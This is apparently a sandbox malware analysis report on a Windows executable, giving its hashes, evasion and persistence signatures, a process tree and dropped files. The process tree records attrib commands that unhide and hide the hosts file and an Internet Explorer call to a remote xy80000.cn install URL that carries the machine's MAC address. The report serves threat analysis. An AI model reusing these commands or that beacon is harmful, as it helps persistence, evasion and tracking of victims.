Overview

overview

8

Static

static

3

4440a230e8...58.exe

windows7-x64

8

4440a230e8...58.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    151s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    05-01-2024 19:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4440a230e8ca193cc3cf2f4d0b535358.exe

  • Size

    46KB

  • MD5

    4440a230e8ca193cc3cf2f4d0b535358

  • SHA1

    df64278b8498fb4020b99774260d2b526da051d3

  • SHA256

    0259fedbd9c3c260c01ad6bd9be17dd2e7902a4c35d857b6378a8ddeab91db80

  • SHA512

    c5347f037e32510293909538a15c70c2a17f3261ede313923acda35f149b0b410efc0cc2ede27ac8e6b3387cd50304657f3c3ef061036d19353435b423172935

  • SSDEEP

    768:SMVvp3w/z5K2u2QeGooyw765XOMD+fYzYcNxHSS1zL1Jdh2zUoxMak8nRD6MzW+8:SMVvp3w/zATFPU5X3DvzJFSS1zL1Jdhv

Score
8/10
evasionpersistence

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1184
      • C:\Users\Admin\AppData\Local\Temp\4440a230e8ca193cc3cf2f4d0b535358.exe
        "C:\Users\Admin\AppData\Local\Temp\4440a230e8ca193cc3cf2f4d0b535358.exe"
        2⤵
        • Adds policy Run key to start application
        • Drops file in Drivers directory
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Views/modifies file attributes
          PID:1956
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2740
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://xy80000.cn/union/install.asp?ver=090102&tgid=qq88&address=EE-D0-D7-A1-BF-98&regk=1&flag=20e2ed4bf8dc3bade262d78abe7e95ff&frandom=5305"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3020
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3020 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2880

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      095867ff4642a1828270ceb3c1657372

      SHA1

      60663580bb21d0d284b834d2a35b7ee3f4baf3e2

      SHA256

      203349c78c14c7f139d1f261ac2414aecbc73cbcbcf664080354832b14ebd626

      SHA512

      4932b1a203a3acea7050731c1069b69f45ecc3c7475e8051105672836bc964c681fa0a30e0eecf96bdd7b44b97a9ff3a3f1d8a2ad287652a518849ab47044dd3

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      312d8bf14ce3c3124eecb3ea0d60a0f4

      SHA1

      7800f0b8494c3cbf7e70c8cdc4c137918a0b9dfe

      SHA256

      d408385cfee471ac1bfe6f728b9445ab63a76a9a093c35bcdb0629ebabe63c57

      SHA512

      305c2f6fa65e66e1a8241ee4299eb1122acaf592548b7207385b98e651c2747183ab32e7ea2099e74b4678c523762b30626f375e2a13d56128ef539250bd9efc

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      92f7f62d9be57aeaa932c1ff9d4a52d7

      SHA1

      2f81c08ede5a7dd77002ccd1ac81949f51c0e6b4

      SHA256

      370082b9d5b85c66541d72c75cc9a53716cc52b796d7706dd14e5a531f29b331

      SHA512

      877d0947978fafc7185885d09cca7afad122da5bb19154e3837c2a8b6dfc2f59f21fbade6e881ae577b8b61a28e8df4fbf65e21dc3bd3996341f0ed572246bd6

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      bf425028f3baf7275ccaab8952677863

      SHA1

      911fe349e4498907074f163dc71b5df8762d6310

      SHA256

      2b3a9bf7ebe24ca59cc3b0cda166a216d7db1d5d0b2ae1018d4d31536505bb52

      SHA512

      ef58303b262488c714e7e3f26ddfc30188f502379617c5709c2dd1622aa9cf67e6a7c4b74bebd3192e37826cff2d69df7f87d32da9975732a1b30c4f2d6f5a0d

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      0a8d791413656f19be08fe36d80f3a96

      SHA1

      7989a225d8611c062e9b9b4ab4ea6d113e0cc436

      SHA256

      d5b6ca9646b92c90fecadc9e5ed1157b223aa2e01e141ab004f348b4b0a2978a

      SHA512

      1bf36ff854d0c023b492c4d9c3931beb05fad0afb1b917889451ab14c26677d58b20c7e5f0737c9e2ce5d4b1ea0afeaedc7cf274ff4b3c206775ac5c4d867c59

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      56e094f1df85a0963163a89567dc657b

      SHA1

      a86e4094309ad00c1e38401c8996e3fa78cb6687

      SHA256

      aad12c188323ac005daaf0395392ae5e836b376e76644b6052a3cef31cfeef90

      SHA512

      5e7636e288d9683865c0dc66f9b0a90fae040d86d2b2a111ead79aadb3c234484252f11a31e49671a7da0544cd8e6a0549b78d2c0cbfecc559e8ed94f0c504d2

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      c33ea50ea0ff799592e0a66881295467

      SHA1

      4be3a86e61ce11b67f65c40d007cb3a20ac5a653

      SHA256

      fe29e4e7b7ea1772168a20ddf34e2f004b5c0c77e3af75c41fe148feead46193

      SHA512

      d5cf70930598f47a3e298635a7d664a6ee25b07e5257f75bafbac30a8b637fef55875a3dfd53558d3cf433ad0eca3d163a8a56ab4643237f3d4a940e7b2300d9

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab45CA.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar45EC.tmp
      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\~DFC0E6F19BCAB830FE.TMP
      Filesize

      16KB

      MD5

      ca184ad3037e5de79eca0c99fa39b900

      SHA1

      03ca44c68aaf55de1be8e58acb8914e78c5249f3

      SHA256

      5d94602f62ef8a41424136463180d9dfedcf62870f2708986ef0e54c35698591

      SHA512

      f7a7683b41a1128d26d0b399c287b5de8f4bb9520c85fc61e18b4f7f57b514a9704a3753bfc8536260a815a3a4660a85cf248edc6019ab0114f14e634f78e967

      Download Submit

    • memory/1184-424-0x0000000002A00000-0x0000000002A01000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1184-426-0x0000000002A00000-0x0000000002A01000-memory.dmp

      Filesize

      4KB

      Download